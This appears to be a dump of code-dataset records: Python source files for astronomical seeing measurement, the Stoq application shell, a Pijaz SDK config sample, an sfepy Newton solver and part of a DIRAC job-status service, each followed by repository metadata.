It is assumed that the number in the name of the files do not contains leading zero
(example: 'seeing-1.fit' to 'seeing-152.fit').
:param result_file: the file where the results will be written (CSV file)
:param show_error_bar: if we plot error bars (example : True)
:param sampling: the portion of sky viewed by a photosite (in arcsec)
:param location: the location where the images have been taken. It is printed in the title of the plot image.
:param instrument: the instrument with which the images were taken
:return: void. Create or append to a file named 'seeing_measurement.csv' in execution directory with the results.
Show a chart with the results.
"""
target_fwhm_arcsec = 1.5 # to help the gaussian fitting
# Create a file to write the results
with open(result_file, 'a') as results:
# Header of CSV file
results.write('Date and time UTC,MJD,Seeing in arcsec,Std dev\n');
measurements = np.array([])
datetimes = np.array([])
errorbar = np.array([])
# For each file
for i in range(1,number_of_files+1):
# Open FITS file
filename = file_prefix + str(i) + file_suffix
path = directory + filename
print "Read FITS file " + path
hdulist = fits.open(path)
# Get date and time of observation in FITS header
datetime_string = hdulist[0].header['DATE-OBS']
time = Time(datetime_string, format='isot', scale='utc')
# Get length of X axis in FITS header
length_x_axis = hdulist[0].header['NAXIS1']
# Analyse data
img_data = hdulist[0].data
img = TrailsImage(img_data, sampling, target_fwhm_arcsec, length_x_axis)
img.search_trails()
img.calculate_fwhm()
# Print results
print "Date and time: %s UT" % datetime_string
print "Number of trails: %i" % img.nb_trails()
# if there is at least one star trail we can use and the incertitude of the measure is reasonable
if(img.nb_trails() > 0 and img.mean_stddev() < 10):
print "Mean FWHM of the trails: %f arcsec" % img.mean_fwhm()
print "StdDev FWHM of the trails: %f" %img.mean_stddev()
# Prepare plotting
measurements = np.append(measurements, img.mean_fwhm())
datetimes = np.append(datetimes, time.datetime)
errorbar = np.append(errorbar, img.mean_stddev())
# Write result in a file
results.write(datetime_string + ',' + str(time.mjd) + ',' + str(img.mean_fwhm()) + ',' + str(img.mean_stddev()) + '\n');
# Close FITS file
hdulist.close()
# Time of the first image of the sequence (used below)
if 'start_time' not in locals():
start_time = time
# Close results file
results.closed
# Plot results
start_time.out_subfmt='date'
plt.figure(1)
plt.title('Seeing ' + location + ' ' + instrument + ' ' + start_time.iso + ' (MJD ' + str(int(start_time.mjd)) + ')', fontsize=16)
plt.xlabel('Time (UT)')
if show_error_bar:
postfix_error_bars = '_withErrorBars'
plt.errorbar(datetimes, measurements, fmt='ko', yerr=errorbar);
else:
postfix_error_bars = ''
plt.plot(datetimes, measurements, 'ko');
plt.gca().xaxis.set_major_formatter(dates.DateFormatter('%H:%M'))
plt.xticks(rotation='vertical')
plt.ylabel('Seeing (arcsec)')
#plt.show()
# save plot in file
filename_beginning = 'seeing_' + location + '_' + start_time.iso + '_' + instrument + postfix_error_bars
filename_end = ''
index_img = 1
extension_img = '.png'
# take care to not override an existing file
while os.path.isfile(filename_beginning + filename_end + extension_img):
filename_end = '_' + str(index_img)
index_img += 1
plt.savefig(filename_beginning + filename_end + extension_img)
# 2015
#main('/home/didier/seeing_images/2015-09-17/', 'zenith_sans_suivi-', '.fits', 53, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-18/', 'zenith-', '.fits', 175, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-19/', 'zenith-', '.fits', 91, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-19/', 'zenith_refocus1-', '.fits', 153, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-19/', 'zenith_refocus1-', '.fits', 3, 'St-Veran')
# 2016
#main('/home/didier/seeing_images/2016-09-19/seeing1/', 'seeing-', '.fits', 121, 'null.csv', False, 0.206, 'St-Veran', 'T62')
main('/home/didier/seeing_images/2016-09-19/seeing2/', 'seeing2-', '.fits', 220, 'null.csv', False, 0.206, 'St-Veran', 'T62')
#main('/home/didier/seeing_images/2016-09-19/seeing3/', 'seeing3-', '.fits', 224, 'null.csv', False, 0.206, 'St-Veran', 'T62')
#main('/home/didier/seeing_images/2016-09-21/T62/', 'seeing1-', '.fits', 788, 'null.csv', False, 0.206, 'St-Veran', 'T62')
#main('/home/didier/seeing_images/2016-09-21/T50/rotate/', 'seeing-t50-1-', '.fits', 84, 'null.csv', False, 0.4635, 'St-Veran', 'T50')
#main('/home/didier/seeing_images/2016-09-21/T50/rotate/', 'seeing-t50-2-', '.fits', 254, 'null.csv', False, 0.4635, 'St-Veran', 'T50') | astrochoupe/seeing-measurement | measure.py | Python | gpl-2.0 | 14,551 | [
"Gaussian"
] | 92cca9e8a1d6e4c458de293050a0882e50f2c2d6000c835fc1bbfa04c48aabd3 |
# -*- coding: utf-8 *-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2005-2013 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
##
""" Stoq shell routines"""
import logging
import os
import sys
import glib
# FIXME: We can import whatever we want here, but don't import anything
# significant, it's good to maintain lazy loaded things during startup
from stoqlib.exceptions import StoqlibError
from stoqlib.lib.translation import stoqlib_gettext as _
from twisted.internet.defer import inlineCallbacks, succeed
log = logging.getLogger(__name__)
_shell = None
PRIVACY_STRING = _(
"One of the new features of Stoq 1.0 is support for online "
"services. Features using the online services include automatic "
"bug report and update notifications. More services are under development."
"To be able to provide a better service and properly identify the user "
"we will collect the CNPJ of the primary branch and the ip address.\n\n"
"<b>We will not disclose the collected information and we are committed "
"to keeping your privacy intact.</b>")
class ShellDatabaseConnection(object):
"""Sets up a database connection
- Connects to a database
- Telling why if it failed
- Runs database wizard if needed
- Runs schema migration
- Activates plugins
- Sets up main branch
"""
def __init__(self, options):
self._options = options
self._config = None
self._ran_wizard = False
def connect(self):
self._load_configuration()
self._maybe_run_first_time_wizard()
self._try_connect()
self._post_connect()
def _load_configuration(self):
from stoqlib.lib.configparser import StoqConfig
log.debug('reading configuration')
self._config = StoqConfig()
if self._options.filename:
self._config.load(self._options.filename)
else:
self._config.load_default()
def _maybe_run_first_time_wizard(self):
from stoqlib.gui.base.dialogs import run_dialog
from stoq.gui.config import FirstTimeConfigWizard
config_file = self._config.get_filename()
if self._options.wizard or not os.path.exists(config_file):
run_dialog(FirstTimeConfigWizard, None, self._options)
self._ran_wizard = True
if self._config.get('Database', 'enable_production') == 'True':
run_dialog(FirstTimeConfigWizard, None, self._options, self._config)
self._ran_wizard = True
def _get_password(self):
import binascii
configdir = self._config.get_config_directory()
filename = os.path.join(configdir, 'data')
if not os.path.exists(filename):
return
data = open(filename).read()
return binascii.a2b_base64(data)
def _try_connect(self):
from stoqlib.lib.message import error
try:
store_dsn = self._config.get_settings().get_store_dsn()
except:
type, value, trace = sys.exc_info()
error(_("Could not open the database config file"),
_("Invalid config file settings, got error '%s', "
"of type '%s'") % (value, type))
from stoqlib.database.exceptions import PostgreSQLError
from stoqlib.database.runtime import get_default_store
from stoqlib.exceptions import DatabaseError
from stoqlib.lib.pgpass import write_pg_pass
from stoq.lib.startup import setup
# XXX: progress dialog for connecting (if it takes more than
# 2 seconds) or creating the database
log.debug('calling setup()')
try:
setup(self._config, self._options, register_station=False,
check_schema=False, load_plugins=False)
# the setup call above is not really trying to connect (since
# register_station, check_schema and load_plugins are all False).
# Try to really connect here.
get_default_store()
except (StoqlibError, PostgreSQLError) as e:
log.debug('Connection failed.')
error(_('Could not connect to the database'),
'error=%s uri=%s' % (str(e), store_dsn))
except DatabaseError:
log.debug('Connection failed. Tring to setup .pgpass')
# This is probably a missing password configuration. Setup the
# pgpass file and try again.
password = self._get_password()
if not password:
# There is no password stored in data file. Abort
raise
from stoqlib.database.settings import db_settings
write_pg_pass(db_settings.dbname, db_settings.address,
db_settings.port, db_settings.username, password)
# Now that there is a pg_pass file, try to connect again
try:
get_default_store()
except DatabaseError as e:
log.debug('Connection failed again.')
error(_('Could not connect to the database'),
'error=%s uri=%s' % (str(e), store_dsn))
def _post_connect(self):
self._check_schema_migration()
self._check_branch()
self._activate_plugins()
def _check_schema_migration(self):
from stoqlib.lib.message import error
from stoqlib.database.migration import needs_schema_update
from stoqlib.exceptions import DatabaseInconsistency
if needs_schema_update():
self._run_update_wizard()
from stoqlib.database.migration import StoqlibSchemaMigration
migration = StoqlibSchemaMigration()
try:
migration.check()
except DatabaseInconsistency as e:
error(_('The database version differs from your installed '
'version.'), str(e))
def _activate_plugins(self):
from stoqlib.lib.pluginmanager import get_plugin_manager
manager = get_plugin_manager()
manager.activate_installed_plugins()
def _check_branch(self):
from stoqlib.database.runtime import (get_default_store, new_store,
get_current_station,
set_current_branch_station)
from stoqlib.domain.person import Company
from stoqlib.lib.parameters import sysparam
from stoqlib.lib.message import info
default_store = get_default_store()
compaines = default_store.find(Company)
if (compaines.count() == 0 or
not sysparam.has_object('MAIN_COMPANY')):
from stoqlib.gui.base.dialogs import run_dialog
from stoqlib.gui.dialogs.branchdialog import BranchDialog
if self._ran_wizard:
info(_("You need to register a company before start using Stoq"))
else:
info(_("Could not find a company. You'll need to register one "
"before start using Stoq"))
store = new_store()
person = run_dialog(BranchDialog, None, store)
if not person:
raise SystemExit
branch = person.branch
sysparam.set_object(store, 'MAIN_COMPANY', branch)
current_station = get_current_station(store)
if current_station is not None:
current_station.branch = branch
store.commit()
store.close()
set_current_branch_station(default_store, station_name=None)
def _run_update_wizard(self):
from stoqlib.gui.base.dialogs import run_dialog
from stoq.gui.update import SchemaUpdateWizard
retval = run_dialog(SchemaUpdateWizard, None)
if not retval:
raise SystemExit()
class Shell(object):
"""The main application shell
- bootstraps via ShellBootstrap
- connects to the database via ShellDatabaseConnection
- handles login
- runs applications
"""
def __init__(self, bootstrap, options, initial=True):
global _shell
_shell = self
self._appname = None
self._bootstrap = bootstrap
self._dbconn = ShellDatabaseConnection(options=options)
self._blocked_apps = []
self._hidden_apps = []
self._login = None
self._options = options
self._user = None
self.windows = []
#
# Private
#
def _do_login(self):
from stoqlib.exceptions import LoginError
from stoqlib.gui.utils.login import LoginHelper
from stoqlib.lib.message import error
self._login = LoginHelper(username=self._options.login_username)
try:
if not self.login():
return False
except LoginError as e:
error(str(e))
return False
self._check_param_online_services()
self._maybe_show_welcome_dialog()
return True
def _check_param_online_services(self):
from stoqlib.database.runtime import new_store
from stoqlib.lib.parameters import sysparam
import gtk
if sysparam.get_bool('ONLINE_SERVICES') is None:
from kiwi.ui.dialogs import HIGAlertDialog
# FIXME: All of this is to avoid having to set markup as the default
# in kiwi/ui/dialogs:HIGAlertDialog.set_details, after 1.0
# this can be simplified when we fix so that all descriptions
# sent to these dialogs are properly escaped
dialog = HIGAlertDialog(
parent=None,
flags=gtk.DIALOG_MODAL,
type=gtk.MESSAGE_WARNING)
dialog.add_button(_("Not right now"), gtk.RESPONSE_NO)
dialog.add_button(_("Enable online services"), gtk.RESPONSE_YES)
dialog.set_primary(_('Do you want to enable Stoq online services?'))
dialog.set_details(PRIVACY_STRING, use_markup=True)
dialog.set_default_response(gtk.RESPONSE_YES)
response = dialog.run()
dialog.destroy()
store = new_store()
sysparam.set_bool(store, 'ONLINE_SERVICES', response == gtk.RESPONSE_YES)
store.commit()
store.close()
def _maybe_show_welcome_dialog(self):
from stoqlib.api import api
if not api.user_settings.get('show-welcome-dialog', True):
return
api.user_settings.set('show-welcome-dialog', False)
from stoq.gui.welcomedialog import WelcomeDialog
from stoqlib.gui.base.dialogs import run_dialog
run_dialog(WelcomeDialog)
def _maybe_correct_demo_position(self, shell_window):
# Possibly correct window position (livecd workaround for small
# screens)
from stoqlib.lib.parameters import sysparam
from stoqlib.lib.pluginmanager import get_plugin_manager
manager = get_plugin_manager()
if (sysparam.get_bool('DEMO_MODE') and
manager.is_active(u'ecf')):
pos = shell_window.toplevel.get_position()
if pos[0] < 220:
shell_window.toplevel.move(220, pos[1])
def _maybe_schedule_idle_logout(self):
# Verify if the user will use automatic logout.
from stoqlib.lib.parameters import sysparam
minutes = sysparam.get_int('AUTOMATIC_LOGOUT')
# If user defined 0 minutes, ignore automatic logout.
if minutes != 0:
seconds = minutes * 60
glib.timeout_add_seconds(5, self._verify_idle_logout, seconds)
def _verify_idle_logout(self, seconds):
# This is called once every 10 seconds
from stoqlib.gui.utils.idle import get_idle_seconds
if get_idle_seconds() > seconds:
return self._idle_logout()
# Call us again in 10 seconds
return True
def _idle_logout(self):
# Before performing logout, verify that the currently opened window
# is modal.
from kiwi.component import get_utility
from stoqlib.gui.base.dialogs import has_modal_window
from stoqlib.lib.interfaces import ICookieFile
# If not a modal window, logout.
# Otherwise returns True to continue checking the automatic logout.
if not has_modal_window():
log.debug('Automatic logout')
get_utility(ICookieFile).clear()
self.quit(restart=True)
return True
def _logout(self):
from stoqlib.database.runtime import (get_current_user,
get_default_store)
log.debug('Logging out the current user')
try:
user = get_current_user(get_default_store())
if user:
user.logout()
except StoqlibError:
pass
@inlineCallbacks
def _terminate(self, restart=False, app=None):
log.info("Terminating Stoq")
# This removes all temporary files created when calling
# get_resource_filename() that extract files to the file system
import pkg_resources
pkg_resources.cleanup_resources()
log.debug('Stopping deamon')
from stoqlib.lib.daemonutils import stop_daemon
stop_daemon()
# Finally, go out of the reactor and show possible crash reports
yield self._quit_reactor_and_maybe_show_crashreports()
if restart:
from stoqlib.lib.process import Process
log.info('Restarting Stoq')
args = [sys.argv[0], '--no-splash-screen']
if app is not None:
args.append(app)
Process(args)
# os._exit() forces a quit without running atexit handlers
# and does not block on any running threads
# FIXME: This is the wrong solution, we should figure out why there
# are any running threads/processes at this point
log.debug("Terminating by calling os._exit()")
os._exit(0)
raise AssertionError("Should never happen")
def _show_crash_reports(self):
from stoqlib.lib.crashreport import has_tracebacks
if not has_tracebacks():
return succeed(None)
if 'STOQ_DISABLE_CRASHREPORT' in os.environ:
return succeed(None)
from stoqlib.gui.dialogs.crashreportdialog import show_dialog
return show_dialog()
@inlineCallbacks
def _quit_reactor_and_maybe_show_crashreports(self):
log.debug("Show some crash reports")
yield self._show_crash_reports()
log.debug("Shutdown reactor")
from twisted.internet import reactor
reactor.stop()
#
# Public API
#
def login(self):
"""
Do a login
@param try_cookie: Try to use a cookie if one is available
@returns: True if login succeed, otherwise false
"""
from stoqlib.exceptions import LoginError
from stoqlib.lib.message import info
user = self._login.cookie_login()
if not user:
try:
user = self._login.validate_user()
except LoginError as e:
info(str(e))
if user:
self._user = user
return bool(user)
def get_current_app_name(self):
"""
Get the name of the currently running application
@returns: the name
@rtype: str
"""
if not self.windows:
return ''
app = self.windows[0].current_app
if not app:
return ''
return app.app_name
def create_window(self):
"""
Creates a new shell window.
Note that it will not contain any applications and it will be hidden.
:returns: the shell_window
"""
from stoq.gui.shell.shellwindow import ShellWindow
from stoqlib.database.runtime import get_default_store
shell_window = ShellWindow(self._options,
shell=self,
store=get_default_store())
self.windows.append(shell_window)
self._maybe_correct_demo_position(shell_window)
return shell_window
def close_window(self, shell_window):
"""
Close a currently open window
:param ShellWindow shell_window: the shell_window
"""
shell_window.close()
self.windows.remove(shell_window)
def main(self, appname, action_name=None):
"""
Start the shell.
This will:
- connect to the database
- login the current user
- create a new window
- run the launcher/application selector app
- run a mainloop
This will only exit when the complete stoq application
is shutdown.
:param appname: name of the application to run
:param action_name: action to activate or ``None``
"""
self._dbconn.connect()
if not self._do_login():
raise SystemExit
if appname is None:
appname = u'launcher'
shell_window = self.create_window()
app = shell_window.run_application(unicode(appname))
shell_window.show()
if action_name is not None:
action = getattr(app, action_name, None)
if action is not None:
action.activate()
self._maybe_schedule_idle_logout()
log.debug("Entering reactor")
self._bootstrap.entered_main = True
from twisted.internet import reactor
reactor.run()
log.info("Leaving reactor")
def quit(self, restart=False, app=None):
"""
Quit the shell and exit the application.
This will save user settings and then forcefully terminate
the application
:param restart: if ``True`` restart after terminating
:param str app: if not ``None``, name of the application to restart
"""
from stoqlib.api import api
self._logout()
# Write user settings to disk, this obviously only happens when
# termination the complete stoq application
log.debug("Flushing user settings")
api.user_settings.flush()
self._terminate(restart=restart, app=app)
def get_shell():
return _shell
| andrebellafronte/stoq | stoq/gui/shell/shell.py | Python | gpl-2.0 | 19,092 | [
"VisIt"
] | 6f78883062f843da37aecf11834dbc411b9411fd942c9af9644dee384b0b2479 |
"""
Pijaz client application settings.
Visit http://developer.pijaz.com/#manage-apps to create and edit client
applications.
"""
# App ID.
APP_ID = ''
# API key.
API_KEY = ''
"""
Product settings.
Visit http://developer.pijaz.com/#theme-designer to create and edit platform
products.
"""
# Workflow ID.
WORKFLOW_ID = ''
# Workflow URL.
WORKFLOW_XML_URL = ''
# Full local filepath for image file that the example code will create.
IMAGE_FILEPATH = '/tmp/hello-world-file.jpg'
"""
Pijaz Platform settings.
Settings specifc to the Pijaz Synthesizer Platform, most often these should
not be edited.
"""
# Fully qualified URL of the rendering server, include the trailing slash.
RENDER_SERVER_URL = 'http://render.pijaz.com/'
# Fully qualified URL of the API server, include the trailing slash.
API_SERVER_URL = 'http://api.pijaz.com/'
| pijaz/pijaz-sdk | examples/python/config.sample.py | Python | mit | 860 | [
"VisIt"
] | 4ce49c1d2ce838a157c21ea5169584bf519a8a2e3707e8503834d23ac4f0e37d |
from sfepy.base.base import *
from sfepy.solvers.solvers import NonlinearSolver
import sfepy.base.plotutils as plu
##
# 13.12.2005, c
# 14.12.2005
# 02.10.2007
def check_tangent_matrix( conf, vec_x0, mtx_a0, evaluator ):
vec_x = vec_x0.copy()
delta = conf.delta
vec_r, status = evaluator.eval_residual( vec_x ) # Update state.
mtx_a0, status = evaluator.eval_tangent_matrix( vec_x, mtx_a0 )
mtx_a = mtx_a0.tocsc()
mtx_d = mtx_a.copy()
mtx_d.data[:] = 0.0
vec_dx = nm.zeros_like( vec_r )
for ic in range( vec_dx.shape[0] ):
vec_dx[ic] = delta
xx = vec_x.copy()
evaluator.update_vec( xx, vec_dx )
vec_r1, status = evaluator.eval_residual( xx )
vec_dx[ic] = -delta
xx = vec_x.copy()
evaluator.update_vec( xx, vec_dx )
vec_r2, status = evaluator.eval_residual( xx )
vec_dx[ic] = 0.0;
vec = 0.5 * (vec_r2 - vec_r1) / delta
## ir = mtx_a.indices[mtx_a.indptr[ic]:mtx_a.indptr[ic+1]]
## for ii in ir:
## mtx_d[ii,ic] = vec[ii]
ir = mtx_a.indices[mtx_a.indptr[ic]:mtx_a.indptr[ic+1]]
mtx_d.data[mtx_a.indptr[ic]:mtx_a.indptr[ic+1]] = vec[ir]
vec_r, status = evaluator.eval_residual( vec_x ) # Restore.
tt = time.clock()
print mtx_a, '.. analytical'
print mtx_d, '.. difference'
plu.plot_matrix_diff( mtx_d, mtx_a, delta, ['difference', 'analytical'],
conf.check )
return time.clock() - tt
##
# c: 02.12.2005, r: 02.04.2008
def conv_test( conf, it, err, err0 ):
status = -1
if (abs( err0 ) < conf.macheps):
err_r = 0.0
else:
err_r = err / err0
output( 'nls: iter: %d, residual: %e (rel: %e)' % (it, err, err_r) )
if it > 0:
if (err < conf.eps_a) and (err_r < conf.eps_r):
status = 0
else:
if err < conf.eps_a:
status = 0
if (status == -1) and (it >= conf.i_max):
status = 1
return status
##
# 10.10.2007, c
class Newton( NonlinearSolver ):
name = 'nls.newton'
def process_conf( conf ):
"""
Missing items are set to default values for a linear problem.
Example configuration, all items:
solver_1 = {
'name' : 'newton',
'kind' : 'nls.newton',
'i_max' : 2,
'eps_a' : 1e-8,
'eps_r' : 1e-2,
'macheps' : 1e-16,
'lin_red' : 1e-2, # Linear system error < (eps_a * lin_red).
'ls_red' : 0.1,
'ls_red_warp' : 0.001,
'ls_on' : 0.99999,
'ls_min' : 1e-5,
'check' : 0,
'delta' : 1e-6,
'is_plot' : False,
'problem' : 'nonlinear', # 'nonlinear' or 'linear' (ignore i_max)
}
"""
get = conf.get_default_attr
i_max = get( 'i_max', 1 )
eps_a = get( 'eps_a', 1e-10 )
eps_r = get( 'eps_r', 1.0 )
macheps = get( 'macheps', nm.finfo( nm.float64 ).eps )
lin_red = get( 'lin_red', 1.0 )
ls_red = get( 'ls_red', 0.1 )
ls_red_warp = get( 'ls_red_warp', 0.001 )
ls_on = get( 'ls_on', 0.99999 )
ls_min = get( 'ls_min', 1e-5 )
check = get( 'check', 0 )
delta = get( 'delta', 1e-6)
is_plot = get( 'is_plot', False )
problem = get( 'problem', 'nonlinear' )
common = NonlinearSolver.process_conf( conf )
return Struct( **locals() ) + common
process_conf = staticmethod( process_conf )
##
# 10.10.2007, c
def __init__( self, conf, **kwargs ):
NonlinearSolver.__init__( self, conf, **kwargs )
##
# c: 02.12.2005, r: 04.04.2008
# 10.10.2007, from newton()
def __call__( self, vec_x0, conf = None, evaluator = None,
lin_solver = None, status = None ):
"""setting conf.problem == 'linear' means 1 iteration and no rezidual
check!
"""
conf = get_default( conf, self.conf )
evaluator = get_default( evaluator, self.evaluator )
lin_solver = get_default( lin_solver, self.lin_solver )
status = get_default( status, self.status )
time_stats = {}
vec_x = vec_x0.copy()
vec_x_last = vec_x0.copy()
vec_dx = None
err0 = -1.0
err_last = -1.0
it = 0
while 1:
ls = 1.0
vec_dx0 = vec_dx;
while 1:
tt = time.clock()
vec_r, ret = evaluator.eval_residual( vec_x )
time_stats['rezidual'] = time.clock() - tt
if ret == 0: # OK.
try:
err = nla.norm( vec_r )
except:
output( 'infs or nans in the residual:', vec_r )
output( nm.isfinite( vec_r ).all() )
debug()
if it == 0:
err0 = err;
break
if err < (err_last * conf.ls_on): break
red = conf.ls_red;
output( 'linesearch: iter %d, (%.5e < %.5e) (new ls: %e)'\
% (it, err, err_last * conf.ls_on, red * ls) )
else: # Failure.
red = conf.ls_red_warp;
output( 'rezidual computation failed for iter %d'
' (new ls: %e)!' % (it, red * ls) )
if (it == 0):
raise RuntimeError, 'giving up...'
if ls < conf.ls_min:
if ret != 0:
raise RuntimeError, 'giving up...'
output( 'linesearch failed, continuing anyway' )
break
ls *= red;
vec_dx = ls * vec_dx0;
vec_x = vec_x_last.copy()
evaluator.update_vec( vec_x, vec_dx )
# End residual loop.
err_last = err;
vec_x_last = vec_x.copy()
condition = conv_test( conf, it, err, err0 )
if condition >= 0:
break
tt = time.clock()
if conf.problem == 'nonlinear':
mtx_a, ret = evaluator.eval_tangent_matrix( vec_x )
else:
mtx_a, ret = evaluator.mtx, 0
time_stats['matrix'] = time.clock() - tt
if ret != 0:
raise RuntimeError, 'giving up...'
if conf.check:
tt = time.clock()
wt = check_tangent_matrix( conf, vec_x, mtx_a, evaluator )
time_stats['check'] = time.clock() - tt - wt
## if conf.check == 2: pause()
tt = time.clock()
vec_dx = lin_solver( vec_r, mtx = mtx_a )
time_stats['solve'] = time.clock() - tt
for kv in time_stats.iteritems():
output( '%10s: %7.2f [s]' % kv )
vec_e = mtx_a * vec_dx - vec_r
lerr = nla.norm( vec_e )
if lerr > (conf.eps_a * conf.lin_red):
output( 'linear system not solved! (err = %e)' % lerr )
# raise RuntimeError, 'linear system not solved! (err = %e)' % lerr
evaluator.update_vec( vec_x, vec_dx )
if conf.is_plot:
plu.pylab.ion()
plu.pylab.gcf().clear()
plu.pylab.subplot( 2, 2, 1 )
plu.pylab.plot( vec_x_last )
plu.pylab.ylabel( r'$x_{i-1}$' )
plu.pylab.subplot( 2, 2, 2 )
plu.pylab.plot( vec_r )
plu.pylab.ylabel( r'$r$' )
plu.pylab.subplot( 2, 2, 4 )
plu.pylab.plot( vec_dx )
plu.pylab.ylabel( r'$\_delta x$' )
plu.pylab.subplot( 2, 2, 3 )
plu.pylab.plot( vec_x )
plu.pylab.ylabel( r'$x_i$' )
plu.pylab.draw()
plu.pylab.ioff()
pause()
it += 1
## import pylab as p
## problem = evaluator.problem
## r0 = problem.variables.make_full_vec( vec_r, force_value = 0.0 )
## dx = nm.zeros_like( vec_dx )
## ii = problem.variables.get_indx( 'r', stripped = True )
## dx[ii] = 1.0
## r1 = problem.variables.make_full_vec( mtx_a * dx, force_value = 0.0 )
## p.plot( r0 )
## p.plot( r1 )
## vv = nm.where( nm.abs( r1 ) > 1e-12, 1.0, 0.0 )
## problem.save_state_to_vtk( 'sd.vtk', vv )
## nodes = problem.variables.get_nodes_of_global_dofs( nm.where( vv > 0.5 )[0] )
## print nodes
## # problem.save_regions( 'asdsd' )
## p.show()
if status is not None:
status['time_stats'] = time_stats
status['err0'] = err0
status['err'] = err
status['condition'] = condition
return vec_x
| certik/sfepy | sfepy/solvers/nls.py | Python | bsd-3-clause | 9,028 | [
"VTK"
] | 6ed47d6d78b53d84ef1c8c9b2ae8bfac75a77bd09445369e214d59ae94531314 |
""" JobStateUpdateHandler is the implementation of the Job State updating
service in the DISET framework
The following methods are available in the Service interface
setJobStatus()
"""
from __future__ import absolute_import
import six
from six.moves import range
__RCSID__ = "$Id$"
import time
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Utilities import Time
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.ElasticJobDB import ElasticJobDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
# This is a global instance of the JobDB class
jobDB = False
logDB = False
elasticJobDB = False
JOB_FINAL_STATES = ['Done', 'Completed', 'Failed']
def initializeJobStateUpdateHandler(serviceInfo):
global jobDB
global logDB
jobDB = JobDB()
logDB = JobLoggingDB()
return S_OK()
class JobStateUpdateHandler(RequestHandler):
def initialize(self):
"""
Flags gESFlag and gMySQLFlag have bool values (True/False)
derived from dirac.cfg configuration file
Determines the switching of ElasticSearch and MySQL backends
"""
global elasticJobDB
useESForJobParametersFlag = Operations().getValue('/Services/JobMonitoring/useESForJobParametersFlag', False)
if useESForJobParametersFlag:
elasticJobDB = ElasticJobDB()
self.log.verbose("Using ElasticSearch for JobParameters")
return S_OK()
###########################################################################
types_updateJobFromStager = [[six.string_types, int], six.string_types]
def export_updateJobFromStager(self, jobID, status):
""" Simple call back method to be used by the stager. """
if status == 'Done':
jobStatus = 'Checking'
minorStatus = 'JobScheduling'
elif status == 'Failed':
jobStatus = 'Failed'
minorStatus = 'Staging input files failed'
else:
return S_ERROR("updateJobFromStager: %s status not known." % status)
infoStr = None
trials = 10
for i in range(trials):
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_OK('No Matching Job')
status = result['Value']['Status']
if status == 'Staging':
if i:
infoStr = "Found job in Staging after %d seconds" % i
break
time.sleep(1)
if status != 'Staging':
return S_OK('Job is not in Staging after %d seconds' % trials)
result = self.__setJobStatus(int(jobID), jobStatus, minorStatus, 'StagerSystem', None)
if not result['OK']:
if result['Message'].find('does not exist') != -1:
return S_OK()
if infoStr:
return S_OK(infoStr)
return result
###########################################################################
types_setJobStatus = [[six.string_types, int]]
def export_setJobStatus(self, jobID, status='', minorStatus='', source='Unknown', datetime=None):
""" Set the major and minor status for job specified by its JobId.
Set optionally the status date and source component which sends the
status information.
"""
return self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
###########################################################################
types_setJobsStatus = [list]
def export_setJobsStatus(self, jobIDs, status='', minorStatus='', source='Unknown', datetime=None):
""" Set the major and minor status for job specified by its JobId.
Set optionally the status date and source component which sends the
status information.
"""
for jobID in jobIDs:
self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
return S_OK()
def __setJobStatus(self, jobID, status, minorStatus, source, datetime):
""" update the job status. """
result = jobDB.setJobStatus(jobID, status, minorStatus)
if not result['OK']:
return result
if status in JOB_FINAL_STATES:
result = jobDB.setEndExecTime(jobID)
if status == 'Running' and minorStatus == 'Application':
result = jobDB.setStartExecTime(jobID)
result = jobDB.getJobAttributes(jobID, ['Status', 'MinorStatus'])
if not result['OK']:
return result
if not result['Value']:
return S_ERROR('Job %d does not exist' % int(jobID))
status = result['Value']['Status']
minorStatus = result['Value']['MinorStatus']
if datetime:
result = logDB.addLoggingRecord(jobID, status, minorStatus, datetime, source)
else:
result = logDB.addLoggingRecord(jobID, status, minorStatus, source=source)
return result
###########################################################################
types_setJobStatusBulk = [[six.string_types, int], dict]
def export_setJobStatusBulk(self, jobID, statusDict):
""" Set various status fields for job specified by its JobId.
Set only the last status in the JobDB, updating all the status
logging information in the JobLoggingDB. The statusDict has datetime
as a key and status information dictionary as values
"""
status = ""
minor = ""
application = ""
appCounter = ""
endDate = ''
startDate = ''
startFlag = ''
jobID = int(jobID)
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_ERROR('No Matching Job')
new_status = result['Value']['Status']
if new_status == "Stalled":
status = 'Running'
# Get the latest WN time stamps of status updates
result = logDB.getWMSTimeStamps(int(jobID))
if not result['OK']:
return result
lastTime = max([float(t) for s, t in result['Value'].items() if s != 'LastTime'])
lastTime = Time.toString(Time.fromEpoch(lastTime))
# Get the last status values
dates = sorted(statusDict)
# We should only update the status if its time stamp is more recent than the last update
for date in [date for date in dates if date >= lastTime]:
sDict = statusDict[date]
if sDict['Status']:
status = sDict['Status']
if status in JOB_FINAL_STATES:
endDate = date
if status == "Running":
startFlag = 'Running'
if sDict['MinorStatus']:
minor = sDict['MinorStatus']
if minor == "Application" and startFlag == 'Running':
startDate = date
if sDict['ApplicationStatus']:
application = sDict['ApplicationStatus']
counter = sDict.get('ApplicationCounter')
if counter:
appCounter = counter
attrNames = []
attrValues = []
if status:
